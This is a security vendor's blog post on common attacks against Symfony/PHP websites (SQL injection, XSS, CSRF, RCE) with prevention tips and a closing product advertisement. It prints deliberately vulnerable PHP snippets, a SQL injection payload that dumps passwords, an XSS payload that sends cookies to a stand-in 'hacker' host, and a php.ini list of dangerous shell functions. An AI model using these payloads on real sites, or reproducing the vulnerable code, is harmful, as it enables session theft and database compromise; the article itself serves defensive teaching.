Symfony is a popular PHP framework that makes it easy for users to create PHP websites and web applications. In the past, there have been instances when Drupal was affected due to a flaw in the Symfony framework. Ultimately, this lead to the Symfony website hacked. Though this was a flaw of the Symfony framework at times, unsafe development practices also make your PHP website vulnerable. Through this article, you will learn what are the critical vulnerabilities that can lead to Symfony website hacked and how to prevent them.
The popularity of Symfony can be attributed to the fact that it provides a set of decouple and usable PHP libraries. These libraries can speed up development and make it easier altogether. However, just using the Symfony framework alone cannot secure your PHP website. According to data from Contrast Security,
The average application is 79% library code, and only 21% custom code. Just over 76% of applications contain at least one vulnerability, and 34% containing four or more vulnerabilities. These are shocking failures of the software supply chain.
Symfony Website Hacked: Symptoms
-
Suspicious tables in the database, unknown users and unknown files on the system could be a sign of Symfony SQL Injection.
-
Pop-ups and advertisements redirecting to fishy domains can be a result of Symfony Remote Code Execution.
-
If users complain about account deletion or manipulation of data without their validation on your site, it could be due to Symfony Cross-Site Request Forgery.
-
Gibberish content appears on your site due to Symfony stored Cross-Site Scripting.
Causes of Symfony Website Hacked
Symfony Website Hacked: SQL Injection
Symfony SQL injection is a type of attack which mainly targets the database of your site. Lack of user input sanitization makes the site vulnerable which then lead to the Symfony website hacked. For example, look at the code given below:
<?php$query = "SELECT id, name, inserted, size FROM products WHERE size = '$size'";$result = odbc_exec($conn, $query);?>This looks like a simple PHP code to execute an SQL query but, the attacker can use it to reveal all the passwords from the database using the SELECT SQL command. The input provided to $size variable would look something like:
'union select '1', concat(uname||'-'||passwd) as name, '1971-01-01', '0' from user;--This statement upon execution can list all the passwords from the table named user. The symbols ‘—‘ at the end of this statement would turn rest of the code in this line into comments to avoid any errors. This is just a small example, attackers can use it in various ways to manipulate, edit and even delete your database. In some Symfony website hacked cases, SQLi can also be used to obtain a reverse shell.
Symfony Website Hacked: Cross-Site Scripting
XSS is a widely found vulnerability that occurs due to lack of proper user input sanitization. This vulnerability is commonly found in search boxes, message boards, etc. A Symfony website hacked due to XSS can be used by the attacker to steal cookies and thus take over the session. For example, crafting a search query with the following code can allow an attacker to steal the cookies of whosoever clicks on it.
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>Here the ‘>‘ character would close the previous tags. Thereafter, the image() constructor would create a new image in the variable ‘img‘. The next line would determine the source of the image and in the same line, the document.cookie method would be used to get the cookie for session takeover.
If the XSS is stored or persistent, it is even more dangerous because this script will steal cookies automatically when someone opens the infected page. Whereas, reflected XSS relies on social engineering attacks. Not only cookie stealing but Symfony website hacked due to XSS can also be used for all kinds of phishing attacks!
Need help with your hacked Symfony website repair? Clean your site now
Symfony Website Hacked: Cross-Site Request Forgery
CSRF can be used by attackers to make your victims do unwanted tasks like account deletion, manipulating the user data, etc. For example, when a user is logged into your site, visiting a specially crafted page like one given below can result in deletion of the account.
This page will use the ‘delete’ value of the action to delete the user account. Although the attacker can use CSRF to conduct various attacks there is no mechanism for him/her to see that they were successfully executed.
Symfony Website Hacked: Remote Code Execution
Remote code execution occurs in websites using Symphony due to poor coding standards. The biggest security issue in all the above-given attacks is trusting the user input. For instance, poor use of eval() function in PHP code would look like this:
$myvar = "varname";$x = $_GET['arg'];eval("\$myvar = \$x;");This seems pretty simple code which will take the arguments and use the eval function to execute the string as a PHP code. But since the input is not filtered, the attacker can supply some values like
/index.php?arg=1; phpinfo() which would lead to code execution of the phpinfo() function.
Symfony Website Hacked: Safe Development Practices
-
To prevent XSS attacks in your Symfony website, use the function htmlspecialchars() Implement it whenever any user input is needed to be displayed as an output on browser.
-
Implement a random token hidden in the page to avoid CSRF attack like this: <input type=”hidden” name=”csrf” value=”<?php echo $_SESSION[“token”]; ?>”>
-
To prevent RCE disable all the dangerous functions via this PHP directive in the php.ini file: disable_functions = “show_source, system, shell_exec, passthru, exec, popen, proc_open, allow_url_fopen, eval”
-
So the crux is that most of the vulnerabilities can be avoided by not trusting the user input in your Symfony website.
-
Go for a full security audit if you doubt any vulnerabilities may be lurking on your website.
Astra
With our machine-learning powered malware scanner and intelligent firewall, your website security becomes more hardened. All this comes for an affordable price as the plans are flexible to cater even to smaller websites. Get an Astra Web Protection Free Trial now!